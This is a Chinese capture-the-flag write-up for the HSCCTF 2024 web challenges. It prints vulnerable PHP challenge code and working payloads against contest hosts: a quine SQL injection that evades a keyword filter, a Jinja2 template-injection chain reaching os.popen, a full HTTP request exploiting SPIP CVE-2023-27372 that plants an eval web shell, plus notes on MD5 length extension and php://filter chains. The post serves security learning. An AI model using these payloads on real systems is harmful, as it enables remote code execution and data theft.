https://blog.csdn.net/qq_46548764/article/details/136633054?utm_source=miniapp_weixin
文章首发于CSDN:
-
PWD
<?phperror_reporting(0);highlight_file(__FILE__);$con = mysqli_connect("localhost","root","root","ccut");function waffff($sql) {if (preg_match("/infor|sys|sql|thread|case|when|if|like|left|right|mid|cmp|sub|locate|position|match|find|field|sleep|repeat|lock|bench|process|<|>|=|xor|and|&&|\\/i", $sql)) {die("hacker");}}if (isset($_POST['password'])) {$password = $_POST['password'];waffff($password);$sql = "SELECT password FROM users WHERE username='admin' and password='$password'";$user_result = mysqli_query($con,$sql);$row = mysqli_fetch_array($user_result);if ($row['password'] === $password) {include "/flag";} else {echo "error";}}?>
关键代码如下:
$password = $_POST['password'];$sql = "SELECT password FROM users WHERE username='admin' and password='$password'";if ($row['password'] === $password) {include "/flag";}
这里的考点是Quine注入,POC如下:
'/**/union/**/SELECT/**/REPLACE(REPLACE('"/**/union/**/SELECT/**/REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")/**/AS/**/zue3r#',CHAR(34),CHAR(39)),CHAR(46),'"/**/union/**/SELECT/**/REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")/**/AS/**/zue3r#')/**/AS/**/zue3r#
2.SHIROSHORTMENSHELL
提示用到shiro,直接利用利群一把梭。
3.TMPL
存在SSTI注入漏洞,工具一把梭,POC如下:
message={% set zero = (self|int) %}{% set one=(zero**zero)|int %}{% set two = (zero-one-one)|abs %}{% set three=(two*two-one)|int %}{% set four = (two*two)|int %}{% set five = (two*two*two)-one-one-one %}{% set seven = (zero-one-one-five)|abs %}{% set eight = (two*two*two)|int %}{% set c = dict(c=aa)|reverse|first %}{% set bfh = self|string|urlencode|first %}{% set bfhc=bfh~c %}{% set space = bfhc%((three~two)|int) %}{% set xg = bfhc%((four~seven)|int) %}{% set cat = dict(ca=aa,t=dd)|join %}{% set flag = dict(fl=aa,ag=dd)|join %}{% set payload = cat~space~xg~flag%}{% set a = dict(__class__=aa)|reverse|first %}{% set b = dict(__init__=aa)|reverse|first %}{% set c = dict(__globals__=aa)|reverse|first %}{% set d = dict(__getitem__=aa)|reverse|first %}{% set e = dict(os=aa)|reverse|first %}{% set f = dict(popen=aa)|reverse|first %}{% set g = dict(read=aa)|reverse|first %}{{config|attr(a)|attr(b)|attr(c)|attr(d)(e)|attr(f)(payload)|attr(g)()}}{{g}}
4.LOG
<?phperror_reporting(0);$secret=getenv("SECRETKEY"); # For security reasons, the key length is greater than 8.if(isset($_GET["md5"]) && isset($_GET["applicant"]) && isset($_GET["filename"])){if($_GET["md5"] === md5($secret.$_GET["applicant"].$_GET["filename"])){$file_contents = file_get_contents($_GET["filename"]);echo $file_contents;}else{die("My tool is safe.");}}else{highlight_file(__FILE__);}
这里的考点是MD5长度扩展攻击,需要对secret长度进行爆破,相关脚本下载。
https://github.com/shellfeel/hash-ext-attack?tab=readme-ov-file
5.DESERIALIZATION
搜索SPIP CMS相关漏洞,参考CVE-2023-27372
POC如下
POST /spip.php?page=spip_pass&8=system('more%20/flag'); HTTP/1.1Host: 649ebf52-a81f-4e7c-ab2d-c58249beba9d.game.hscsec.cn:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 191page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?=eval($_GET[8])?>";&nobot=
6.CHECKIN
<?phphighlight_file(__FILE__);error_reporting(0);$a=$_POST[1];$b="php://filter/$a/resource=/dev/null";if(file_get_contents($b)==="2024"){echo file_get_contents('/flag');}else{echo $b;}
直接参考这个文章就好:
https://tttang.com/archive/1395/
原文始发于微信公众号(小呆安全):HSCCTF 2024 (WEB方向)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论